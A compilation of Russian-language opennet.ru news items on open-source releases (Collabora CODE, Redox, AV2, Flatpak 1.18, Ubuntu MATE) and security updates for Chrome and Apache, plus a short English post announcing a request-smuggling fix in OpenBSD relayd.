• Предложена новая runtime-библиотека, работающая в неблокирующем режиме и предоставляющая абстракции, транслируемые в аппаратные асинхронно выполняемые команды. Поддерживаются очереди, события, модули и синхронизация на базе асинхронных барьеров с семантикой arrive/wait/event.
• Добавлена поддержка укороченных инструкций RISC-V (RVC).
• Реализована аппаратная поддержка атомарных операций (Hardware Atomics).
• Полностью переработан FPU и предложены новые блоки умножителей (Wallace-tree, Folded-radix) и сумматоров (Kogge-Stone).
• Добавлен стек виртуальной памяти на базе блока управления памятью (MMU) с поддержкой 32-битной архитектуры виртуальной адресации SV32.
• Поддержка RISC-V расширения Zicond c реализацией условных операций.
• Интегрировано управление тактовой частотой (clock gating).
• Реализована поддержка языка HIP (Heterogeneous Interface for Portability) через фреймворк chipStar, транслирующий HIP в SPIR-V.
• Обеспечена полноценная интеграция с симулятором GEM5 и добавлена поддержка симулятора SimX на архитектуре TLM (Transaction-Level Modeling).
• Добавлена поддержка инструментариев Synopsys и Yosys для синтеза логики для производства чипов, а также поддержка использования библиотек стандартных элементов ASAP7 (7nm), SAED14 (14nm) и NanGate (15nm).
• Эталонный инструментарий обновлён до LLVM 20 и POCL 7.0.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65652

Платформа CODE 26.04 для совместной работы с офисным пакетом на основе LibreOffice

Collabora Online имеет клиент-серверную архитектуру, при которой на сервере выполняется LibreOffice Core, отвечающий за компоновку и отрисовку документов, электронных таблиц, презентаций и векторной графики, а за интерфейс отвечает web-приложение. Работа с офисным пакетом осуществляется через web-браузер с возможностью совместной работы нескольких пользователей, которые могут одновременно вносить изменения, оставлять комментарии и отвечать на вопросы. Вклад, текущие правки и позиции курсоров каждого пользователя выделяются разными цветами.

CODE преподносится как вариант платформы Collabora Online для разработчиков, включающий самые свежие наработки и пригодный для использования в небольших командах или с целью ознакомительного тестирования. Отдельно развивается продукт Collabora Office, предназначенный для запуска Collabora Online не на серверах, а на локальных системах пользователя. В 2025 году сотрудниками Collabora было внесено 45% от всех изменений в LibreOffice, но в этом году между компанией Collabora и организацией The Document Foundation (TDF) обострился конфликт, связанный с разработкой облачной редакции LibreOffice Online, в результате которого из TDF были исключены все сотрудники Collabora.

В 2020 году для решения вопросов с брендингом и маркетингом компания Collabora создала форк LibreOffice Online и продолжила разработку в своём репозитории под именем Collabora Online. Разработка была перенесена после того, как организация Document Foundation начала продвигать на странице LibreOffice Online продукты других компаний, которые почти ничего не вносили в разработку. В 2022 году совет директоров Document Foundation принял решение о заморозке LibreOffice Online, так как все разработчики из сообщества перешли в проект Collabora Online и не нашлось желающих продолжить сопровождение старого репозитория. В 2026 году решение о заморозке было отменено, а репозиторий LibreOffice Online был воссоздан в виде форка нынешнего репозитория Collabora Online.

Основные изменения в CODE 26.04:

• В редакторы документов, электронных таблиц и презентаций интегрирован AI-ассистент. В Writer AI может применяться для улучшения, объяснения, переработки и обработки текста.

  В Calc AI-ассистент может выполнять такие задачи, как анализ данных и устранение ошибок в формулах.

  

  В Impress доступны возможности для создания презентаций при помощи AI, обобщения и проверки информации, преобразования текста из документа в сокращённую форму для вставки в презентацию, разделения данных на слайды и структурирования больших отчётов.

  
• В Writer добавлен режим наглядного сравнения документов, позволяющий в одном окне бок о бок оценить различия в двух документах или разных версиях одного документа.
• Добавлен режим многостраничного просмотра, позволяющий одновременно просматривать в одном окне несколько произвольно выбранных страниц для упрощения навигации по длинным документам.
• Изменено оформление панелей с комментариями, которые теперь представлены в виде карт, размещаемых рядом с комментируемым содержимым.
• Реализован умный режим отслеживания и рецензирования изменений, зависящих от других изменений (например, принятие или отклонение изменения теперь автоматически принимает или отклоняет все вложенные изменения).
• Изменено оформление панели с инструментами рецензирования, наиболее востребованные инструменты в которой, такие как работа с комментариями и проверка орфографии, сделаны более заметными.
• В навигатор по документу (Writer Navigator) встроена функция поиска, позволяющая разом просматривать все совпадения и быстро перемещаться по большому документу.
• В панели с настройками стиля в дополнение к прокручиваемому списку с примерами реализован предпросмотр по месту результата выбора разных опций форматирования.
• Добавлена поддержка импорта и экспорта документов в формате Markdown.
• При экспорте в формате PDF реализована возможность сохранения документа с комментариями, показываемыми в форме аннотаций на полях.
• Добавлен режим рецензирования, позволяющий подтверждать или отклонять изменения в документе, без возможности редактировать сам документ.
• Обеспечен адаптивный выбор позиции и уровня масштабирования документа, зависящий от доступного экранного пространства.
• В табличном процессоре реализована возможность работы пользователей со своими представлениями листов при совместной работе с общей электронной таблицей. Каждый пользователь при совместном редактировании может выставить свои фильтры и настройки, которые будут действовать только на его экземпляр и не повлияют на работу других пользователей.
• Улучшена обработка ошибок в формулах. Рядом с ячейками, содержащими ошибки, теперь показывается метка, через которую можно открыть диалог для инспектирования и редактирования формулы.
• В сводных таблицах (Pivot Tables) добавлена возможность вставки столбцов со значениями, не подставляемыми напрямую, а вычисляемыми на основе данных из электронной таблицы.
• Добавлена возможность выбора стиля таблиц, например, можно выбирать светлую, среднюю и темную тему, подсвечивать заголовки или выделять нечётные строки другим оттенком.
• В Calc добавлены новые функции, среди которых CHOOSECOLS, CHOOSEROWS, DROP, EXPAND, HSTACK, TAKE, TEXTAFTER. TEXTBEFORE, TEXTSPLIT, TOCOL, TOROW, VSTACK, WRAPCOLS и WRAPROWS.
• Добавлена возможность выделения отдельных вкладок другим цветом.
• Повышена интерактивность режима совместного проведения презентации, при котором докладчик запускает презентацию, а у остальных участников она начинает показываться и переключаться между слайдами автоматически. В новой версии участники могут приостановить автопереключение и пролистать слайды назад.
• Предоставлена возможность создания слайдов разного размера в одной презентации.
• Добавлена поддержка группировки слайдов в секции, что может использоваться для навигации с учётом структуры презентации.
• Улучшена группировка элементов, расстановка меток и обработка выпадающих списков в панели с меню на экранах с различным разрешением. Добавлены всплывающие подсказки с информацией об элементах меню.
• Добавлен встроенный диалог для изменения настроек приложения, доступный прямо из редактора документов и не требующий открытия отдельного интерфейса администратора.
• В диалоге выбора шрифта реализовано обновление списка предлагаемых шрифтов по мере набора маски для фильтрации выбора.
• В контекстное меню строки состояния добавлены опции для управления показом индикаторов.
• В контекстное меню, показываемое для изображений в документе, добавлена функция извлечения и сохранения изображения.
• Предоставлена возможность открытия шаблонов OOXML в режиме редактирования.
• Добавлена опция для открытия определённых типов документов по умолчанию в режиме просмотра с возможностью при желании переключиться в режим редактирования.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65649

Для ОС Redox портирована среда рабочего стола Xfce и реализован планировщик задач EEVDF

Для Redox также реализован новый планировщик задач, использующий алгоритм EEVDF (Earliest Eligible Virtual Deadline First). Новый планировщик при выборе следующего процесса для передачи выполнения учитывает процессы, которые недополучили процессорные ресурсы или получили незаслуженно много процессорного времени. В первом случае форсируется передача управления процессу, а во втором, наоборот, откладывается.

Продолжена работа по улучшению совместимости c POSIX стандартной Си-библиотеки relibc, написанной на Rust. Улучшен драйвер псевдотерминалов. Добавлена частичная поддержка ограничения ресурсов при помощи механизма rlimit. Значительно повышена производительность операций poll и epoll (до 4 раз при тестировании в QEMU). Реализовано кэширование inode, позволившее сократить время тестовой компиляции в GCC с 2411 до 670 мс. Реализована инкрементальная компиляция изменений в пакетах.

Из среды рабочего стола COSMIC портирован графический интерфейс для отслеживания состояния системы. Добавлена возможность настройки шрифтов в эмуляторе терминала. Портированы CPython 3.15 и libdrm.

Операционная система Redox развивается в соответствии с философией Unix и заимствует некоторые идеи из SeL4, Minix и Plan 9. Redox использует концепцию микроядра, при котором на уровне ядра обеспечивается только взаимодействие между процессами и управление ресурсами, а вся остальная функциональность вынесена в библиотеки, которые могут использоваться как ядром, так и пользовательскими приложениями. Все драйверы выполняются в пространстве пользователя в изолированных sandbox-окружениях.

Проектом развивается собственный пакетный менеджер, набор стандартных утилит (binutils, coreutils, netutils, extrautils), командная оболочка ion, стандартная Си-библиотека relibc, vim-подобный текстовый редактор sodium, сетевой стек и файловая система. Конфигурация задаётся на языке Toml. Для совместимости с существующими приложениями предоставляется POSIX-прослойка, позволяющая запускать многие программы без портирования.

Протестировать Redox можно воспользовавшись ежедневно обновляемыми сборками для виртуальных машин и реального оборудования (aarch64, i586, i686, riscv64gc, x86_64). Среди поддерживаемого оборудования отмечены устройства с интерфейсом USB, звуковые чипы AC’97 и Intel HD Audio, USB, SATA (AHCI, IDE) и NVMe. Для вывода графики могут применяться API VESA BIOS, UEFI GOP или драйвер для GPU Intel. Поддержка Wi-Fi и Bluetooth пока не доведена до готовности.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65643

Альянс AOMedia объявил о стабилизации видеокодека AV2

Формат AV2 создан при участии компаний Amazon, Apple, Cisco, Google, Huawei, Intel, Meta, Microsoft, Mozilla, Netflix, NVIDIA, Samsung Electronics и Tencent, и развивается с предоставлением безвозмездного доступа к патентам и возможностью использовать кодек без лицензионных отчислений. От AV1 новый кодек отличается повышением эффективности сжатия, что позволяет повысить качество при сохранении прежнего битрейта или снизить битрейт без изменения качества. Кодек оптимизирован для различных сценариев использования, включая потоковое вещание, отдачу видео по запросу (VOD), задействование в видеоконференциях и применение для виртуальной и дополненной реальности. Поддерживаются сценарии с одновременной передачей нескольких потоков в одном bitstream, например, для трансляции стереоскопического видео, ракурсов от разных камер и комбинированных видео.

В AV2 продолжает использоваться гибридная блочно-ориентированная структура, которая в отличие от AV1 реализует более крупные суперблоки 256×256, полностью рекурсивное секционирование (partitioning) и более эффективное разделение параметров яркости и цветности. Задействован унифицированный экспоненциальный квантизатор, охватывающий более широкий диапазон яркости и обеспечивающий большую точность квантования для 8-, 10- и 12-битного видео, а также лучше управляющий низкими битрейтами. Возможности предсказания межкадровых изменений модернизированы для повышения качества моделирования изменения яркости и цветности, учитывают при построении модели до 7 предыдущих кадров, поддерживают временну́ю (temporal) интерполяцию и лучше обрабатывают движение в видео с высоким разрешением или быстро меняющимся содержимым. Реализованы дополнительные фильтры для подавления шумов, уменьшения артефактов от сжатия и сохранения детализации.

В дополнение к эталонной реализации кодека, проект VideoLAN развивает библиотеку dav2d с альтернативным декодировщиком видео в формате AV2. По своим целям и архитектуре библиотека dav2d напоминает проект dav1d и отличается реализацией кодека AV2 вместо AV1. Некоторые общие возможности перенесены из кодовой базы dav1d. Проект оптимизирован для достижения максимальной производительности и заявлен как самый быстрый из существующих декодировщиков AV2 для всех поддерживаемых платформ. В текущем виде Dav1d поддерживает декодирование 8- и 12-битных представлений, с применением для ускорения оптимизаций на базе расширенных наборов инструкций для архитектур x86 (AVX2), ARM (AArch64 NEON) и RISC-V.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65648

Возрождение разработки Ubuntu MATE после ухода основателя проекта

Пользователи прошлых веток Ubuntu MATE могут перейти на пакетную базу Ubuntu 26.04 через установку обновлений, но отдельный установочный образ Ubuntu MATE на базе Ubuntu 26.04 публиковаться не будет. На новых системах можно установить любую редакцию Ubuntu 26.04, после чего развернуть рабочий стол MATE командой "sudo apt install ubuntu-mate-desktop". Осенние сборки Ubuntu MATE 26.10 планируют сформировать как полноценный релиз.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65647

New disclosure: CL.TE HTTP request smuggling in OpenBSD relayd.
Latent in relay_http.c since 2012 (OpenBSD 5.2). The body was parsed as chunked but a co-present Content-Length header wasn't stripped before forwarding to backend, contrary to RFC 9112 §6.1.
Found by a targeted source-review pass against the RFC framing rules. Fixed in -current 2026-06-03 in a single commit.
https://stuart-thomas.com/research/relayd-cl-te-smuggling/
#infosec #OpenBSD #vulndisclosure

Обновление Chrome 149.0.7827.102 с устранением 17 критических уязвимстей

Отдельно можно отметить критическую уязвимость CVE-2026-11640, вызванную целочисленным переполнением в библиотеке libyuv и затрагивающую не только браузеры на движике Chromium, но и потенциально и другие проекты, использующие данную библиотеку для масштабирования и преобразования видеокадров, такие как Android, VLC и Telegram.

Отдельно упоминается, что одна на из опасных уязвимостей (CVE-2026-11645), вызванная переполнением буфера в движке V8, была задействована в эксплоите, применявшемся для атаки на пользователей браузера до публикации исправления (0-day).

Источник: https://www.opennet.ru/opennews/art.shtml?num=65646

Релиз http-сервера Apache 2.4.68 с устранением 13 уязвимостей

Устранённые уязвимости (первые 6 имеют умеренный уровень опасности, а остальные низкий):

• CVE-2026-34355 - переполнение буфера в mod_proxy_html, проявляющееся при обращении к бэкенду, контролируемому атакующим.
• CVE-2026-49975 - отказ в обслуживании через исчерпание всей доступной процессу памяти.
• CVE-2026-44186 - бесконечное зацикливании в модуле mod_proxy_ftp, эксплуатируемое при обращении к подконтрольному атакующему FTP-серверу.
• CVE-2026-44119 - локальные пользователи с правами создания файлов .htaccess могут прочитать содержимое файлов с привилегиями пользователя httpd.
• CVE-2026-43951 - аварийное завершение процесса из-за чтения из области памяти за пределами выделенного буфера в mod_headers и mod_mime.
• CVE-2026-42535 - уязвимость в mod_dav_fs, позволяющая авторам содержимого WebDAV получить доступ каталогу, требующему расширенных привилегий.
  
  
  
  
• CVE-2026-29167 - обращение к памяти после её освобождения в mod_ldap.
• CVE-2026-29170 - межсайтовый скриптинг в mod_proxy_ftp.
• CVE-2026-34356 - переполнение буфера в реализации ProxyPassReverseCookieMap.
• CVE-2026-42536 - переполнение буфера в mod_xml2enc.
• CVE-2026-44185 - чтение из области вне буфера в mod_ssl при выполнении запросов к OCSP-серверу атакующего.
• CVE-2026-44631 - переполнение буфера при обработке регулярных выражений в конфигурации.
• CVE-2026-48913 - обращение к памяти после её освобождения в mod_http2, возникающее при исчерпании доступных файловых дескрипторов.

Среди не связанных с безопасностью улучшений:

• В mod_ssl и утилите ab реализована поддержка OpenSSL 4.0.
• В mod_ssl добавлено распознавание типа атрибутов SerialNumber.
• В директиву ErrorLogFormat добавлена поддержка подстановки "%{m}t" для указания в логе времени с миллисекундной точностью.
• Модуль mod_http2 обновлён до версии 2.0.42.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65645

Для ОС Redox портирована среда рабочего стола Xfce и реализован планировщик задач EEVDF

Для Redox также реализован новый планировщик задач, использующий алгоритм EEVDF (Earliest Eligible Virtual Deadline First). Новый планировщик при выборе следующего процесса для передачи выполнения учитывает процессы, которые недополучили процессорные ресурсы или получили незаслуженно много процессорного времени. В первом случае форсируется передача управления процессу, а во втором, наоборот, откладывается.

Продолжена работа по улучшению совместимости c POSIX стандартной Си-библиотеки relibc, написанной на Rust. Улучшен драйвер псевдотерминалов. Добавлена частичная поддержка ограничения ресурсов при помощи механизма rlimit. Значительно повышена производительность операций poll и epoll (до 4 раз при тестировании в QEMU). Реализовано кэширование inode, позволившее сократить время тестовой компиляции в GCC с 2411 до 670 мс. Реализована инкрементальная компиляция изменений в пакетах.

Из среды рабочего стола COSMIC портирован графический интерфейс для отслеживания состояния системы. Добавлена возможность настройки шрифтов в эмуляторе терминала. Портированы CPython 3.15 и libdrm.

Операционная система Redox развивается в соответствии с философией Unix и заимствует некоторые идеи из SeL4, Minix и Plan 9. Redox использует концепцию микроядра, при котором на уровне ядра обеспечивается только взаимодействие между процессами и управление ресурсами, а вся остальная функциональность вынесена в библиотеки, которые могут использоваться как ядром, так и пользовательскими приложениями. Все драйверы выполняются в пространстве пользователя в изолированных sandbox-окружениях.

Проектом развивается собственный пакетный менеджер, набор стандартных утилит (binutils, coreutils, netutils, extrautils), командная оболочка ion, стандартная Си-библиотека relibc, vim-подобный текстовый редактор sodium, сетевой стек и файловая система. Конфигурация задаётся на языке Toml. Для совместимости с существующими приложениями предоставляется POSIX-прослойка, позволяющая запускать многие программы без портирования.

Протестировать Redox можно воспользовавшись ежедневно обновляемыми сборками для виртуальных машин и реального оборудования (aarch64, i586, i686, riscv64gc, x86_64). Среди поддерживаемого оборудования отмечены устройства с интерфейсом USB, звуковые чипы AC’97 и Intel HD Audio, USB, SATA (AHCI, IDE) и NVMe. Для вывода графики могут применяться API VESA BIOS, UEFI GOP или драйвер для GPU Intel. Поддержка Wi-Fi и Bluetooth пока не доведена до готовности.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65643

Релиз системы самодостаточных пакетов Flatpak 1.18.0

Ключевые новшества в ветке Flatpak 1.18:

• Реализована поддержка условных полномочий (conditional permission), позволяющих при запросе полномочий проверить наличие определённых возможностей в системе или в runtime. Например, при необходимости получения доступа к устройству ввода вместо "--device=all" можно запросить полномочие "--device-if=all:!has-input-device --device=input", которое предоставит доступ только к устройствам ввода или откатится на доступ ко всем устройствам если выборочное предоставление доступа не поддерживается в runtime. Аналогично можно запросить доступ к USB-устройвствам ("has-usb-device" и "has-usb-portal") или совместно используемым подсистемам.
• Включена поддержка модуля ядра NTSYNC, позволяющего существенно поднять производительность Windows-игр, запускаемых при помощи Wine. Модуль реализует символьное устройство /dev/ntsync и набор примитивов для синхронизации, применяемых в ядре Windows NT.
• Для GPU Intel Xe включена поддержка API VA-API для аппаратного ускорения декодирования видео.
• Реализована возможность доступа к устройству /dev/kfd (Kernel Fusion Driver) с использованием полномочий, предоставляемых для DRI-устройств. Драйвер kfd реализует интерфейс для прямого выполнения вычислений на GPU AMD из приложений, использующих AMD ROCm, HIP и OpenCL.
• Добавлена поддержка использования опций командой стройки для проброса доступа к каталогам в изолированные приложения.
• Добавлена поддержка каталога "preinstall.d", определяющего список предустанавливаемых Flatpak-приложений (для включения Flatpak-приложений в состав операционной системы).
• Разрешена прямая установка приложений из образов контейнеров в формате OCI, которые могут загружаться из собственных OCI-репозиториев и локальных архивов.
• В команду "flatpak install --from" добавлена поддержка URI "flatpak+https://".
• В команду "flatpak run" добавлена опция "--clear-env" для очистки переменных окружения перед запуском приложения.
• Предоставлена возможность экспорта корневого каталога хост-окружения в изолированное окружение приложения с доступом через каталог /run/host/root.
• Добавлена возможность вывода результата выполнения команд в формате JSON.
• Усилена изоляция сборочного окружения - команда "flatpak build" теперь не предоставляет по умолчанию доступ к хосту.
• Добавлена команда "reinstall" для переустановки зависимостей (bundle).
• Настройки D-Bus по умолчанию перенесены из каталога /etc в /usr.
• Сокращено время запуска при использовании командного интерпретатора fish.
• В libflatpak добавлена функция для получения информации о времени создания конфигурации, что позволяет приложениям, таким как GNOME Software, определить, что прокэшированные ими данные требуют обновления.
• Удалена сборочная опция http_backend, вместо libsoup2 для загрузки по HTTP/HTTPS задействована библиотека libcurl.
• По умолчанию включено использование escape-последовательностей для индикации прогресса выполнения операции.
• Разрешено передавать права доступа к устройствам во вложенные sandbox-окружения, созданные через порталы Flatpak.
• Для приложений, поставляемых в форме OCI-образов, реализован механизм "extra-data", например, позволяющий организовать воспроизведение видео h.265 во Flatpak-пакетах Fedora Linux.
• Добавлена поддержка сжатия зависимостей (OCI bundle) с использованием алгоритма zstd, более эффективно сжимающего данные. По умолчанию для сжатия продолжает использоваться gzip, обеспечивающий максимальную совместимость.

Flatpak упрощает распространение программ, не входящих в штатные репозитории дистрибутивов, за счёт подготовки одного универсального контейнера, избавляющего разработчиков программ от необходимости формировать отдельные сборки для каждого дистрибутива. Пользователям, заботящимся о безопасности, Flatpak даёт возможность выполнить вызывающее сомнение приложение в контейнере, предоставив выборочный доступ только к необходимым сетевым функциям и файлам пользователя. Пользователям, интересующимся новинками, Flatpak позволяет установить самые свежие тестовые и стабильные выпуски приложений без необходимости внесения изменений в систему. Например, Flatpak-пакеты собираются для LibreOffice, GIMP, Inkscape, Kdenlive, Steam, 0 A.D., Visual Studio Code, VLC, Slack, Telegram Desktop, Android Studio и т.д.

Для уменьшения размера в пакет включают лишь специфичные для приложения зависимости. Базовые системные и графические библиотеки (GTK, Qt, библиотеки GNOME и KDE и т.п.) поставляются в виде подключаемых типовых runtime-окружений. Ключевое отличие Flatpak от Snap в том, что Snap использует компоненты окружения основной системы и изоляцию на основе фильтрации системных вызовов, в то время как Flatpak создаёт отдельный от системы контейнер и оперирует крупными runtime-наборами, предоставляя в качестве зависимостей не пакеты, а типовые системные окружения (например, все библиотеки, необходимые для работы программ GNOME или KDE).

Помимо типового системного окружения (runtime), устанавливаемого через специальный репозиторий, поставляются дополнительные зависимости (bundle), требуемые для работы приложения. В сумме "runtime" и "bundle" образуют начинку контейнера, при том, что "runtime" устанавливается отдельно и привязывается сразу к нескольким контейнерам, что позволяет обойтись без дублирования общих для контейнеров системных файлов.

В одной системе может быть установлено несколько разных "runtime" (GNOME, KDE) или несколько версий одного "runtime" (GNOME 50, GNOME 49). Контейнер с приложением в качестве зависимости использует привязку только к определённому "runtime", без учёта отдельных пакетов, формирующих выбранный "runtime". Все недостающие элементы упаковываются непосредственно вместе с приложением. При создании контейнера содержимое "runtime" монтируется как раздел /usr, а "bundle" монтируется в каталог /app.

Начинка "runtime" и контейнеров приложений формируется с использованием технологии OSTree, при которой образ атомарно обновляется из Git-подобного хранилища, позволяющего применять методы версионного контроля к компонентам дистрибутива (например, можно быстро откатить систему к прошлому состоянию). RPM-пакеты транслируются в репозиторий OSTree при помощи прослойки rpm-ostree.

Выборочная установка и обновление пакетов внутри рабочего окружения не поддерживается - система обновляется не на уровне отдельных компонентов, а целиком, атомарно меняя своё состояние. Предоставляются средства для инкрементального применения обновлений, избавляющие от необходимости полной замены образа при каждом обновлении.

Формируемое изолированное окружение не зависит от используемого дистрибутива и при надлежащих настройках пакета не имеет доступа к файлам и процессам пользователя или основной системы, а также не может напрямую обращаться к оборудованию, за исключением вывода через DRI. Вывод графики и организация ввода реализованы при помощи протокола Wayland или через проброс сокета X11. Взаимодействие с внешней средой построено через систему обмена сообщениями DBus и специальный API Portals.

Для изоляции используется прослойка Bubblewrap и традиционные для Linux технологии контейнерной виртуализации, основанные на использовании cgroups, пространств имён (namespaces), Seccomp и SELinux. При создании пакета изоляция может быть отключена, чем пользуются разработчики некоторых пакетов для получения полного доступа к ФС и всем устройствам в системе.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65642